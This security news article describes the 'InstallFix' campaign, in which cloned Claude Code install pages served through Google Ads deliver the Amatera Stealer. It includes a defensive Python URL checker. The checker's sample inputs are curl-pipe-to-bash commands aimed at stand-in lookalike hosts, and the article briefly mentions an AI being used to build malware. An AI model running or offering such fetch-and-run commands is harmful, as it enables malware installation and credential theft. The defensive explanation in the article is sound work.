Date: 2026-03-06

Security researchers at Push Security have discovered a new technique they call InstallFix. Attackers clone installation pages of developer tools such as Claude Code and replace the install commands with malware instructions. The fake pages are distributed via sponsored Google search results and install the Amatera Stealer on victims’ systems.

The attack method builds on the well-known ClickFix pattern, but has the major advantage for attackers that no pretext is needed. The user simply wants to install software, and that is enough. The fake pages are virtually pixel-perfect copies of the official Claude Code installation page, including layout, branding, and documentation sidebar. However, the install commands do not refer to claude.ai but to a server owned by the attacker. Anyone who does not check the URL in the command carefully will not notice any difference. After interacting with the page, visitors are also redirected to the real site, which removes any suspicion.
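
The URL check described above can be automated before a copied one-liner is run. The following is an added example, not code from Push Security or from the article; the trusted-host list, the function names and the sample commands are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts the reader trusts for this installer. claude.ai is the
# host the article names; replace with your own vetted list.
TRUSTED_HOSTS = {"claude.ai"}

# Pull every http(s) URL out of a pasted shell one-liner.
URL_RE = re.compile(r"https?://[^\s'\"|;)<>]+", re.IGNORECASE)


def untrusted_urls(command, trusted=TRUSTED_HOSTS):
    """Return (url, reason) for each URL that is not an exact trusted host over HTTPS."""
    findings = []
    for url in URL_RE.findall(command):
        try:
            parts = urlsplit(url)
            host = (parts.hostname or "").rstrip(".").lower()
        except ValueError:
            findings.append((url, "unparseable URL"))
            continue
        if parts.scheme.lower() != "https":
            findings.append((url, "not https"))
        elif parts.username is not None:
            # https://trusted@other-host/ really connects to other-host
            findings.append((url, "userinfo before '@' hides the real host"))
        elif not host.isascii() or host.startswith("xn--") or ".xn--" in host:
            findings.append((url, "internationalised host can imitate a trusted name"))
        elif host not in trusted:
            # Exact match only: a trusted name used as a subdomain label fails here
            findings.append((url, f"host {host!r} is not on the trusted list"))
    return findings


def safe_to_run(command, trusted=TRUSTED_HOSTS):
    """True only if the command fetches from at least one URL and all are trusted."""
    return bool(URL_RE.findall(command)) and not untrusted_urls(command, trusted)


if __name__ == "__main__":
    # Constructed sample commands, not taken from the campaign.
    for cmd in ("curl -fsSL https://claude.ai/install.sh | bash",
                "curl -fsSL https://claude.ai.download.example/install.sh | bash",
                "curl -fsSL https://claude.ai@cdn.example/install.sh | bash"):
        print(safe_to_run(cmd), untrusted_urls(cmd))
```

Comparing the host exactly, rather than looking for the trusted name somewhere in the URL, is what catches near-identical commands that a visual check misses.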

The fake pages are distributed exclusively via Google Ads, in particular via sponsored search results. Searches such as “Claude Code install” or “Claude Code CLI” lead victims to the malicious pages. Techzine previously reported on a case in which Claude was converted into a malware factory in eight hours, and reported that more than 40,000 OpenClaw agents were found to be vulnerable.

Amatera Stealer as payload

The malware installed via the fake commands is Amatera Stealer. This infostealer first appeared in 2025 and is considered the successor to ACR Stealer. Amatera steals browser data, cookies, session tokens, and system information. The malware communicates with its command-and-control server via hardcoded IP addresses of legitimate CDNs, which makes detection difficult. The attackers abuse Cloudflare Pages, Squarespace, and Tencent EdgeOne for hosting.

The campaign does not stand alone. In addition to the fake Claude Code pages, the researchers also identified clones of the Homebrew installation page and malicious npm packages that imitate the official Claude Code name. According to Push, four out of five ClickFix lures are distributed via search engines.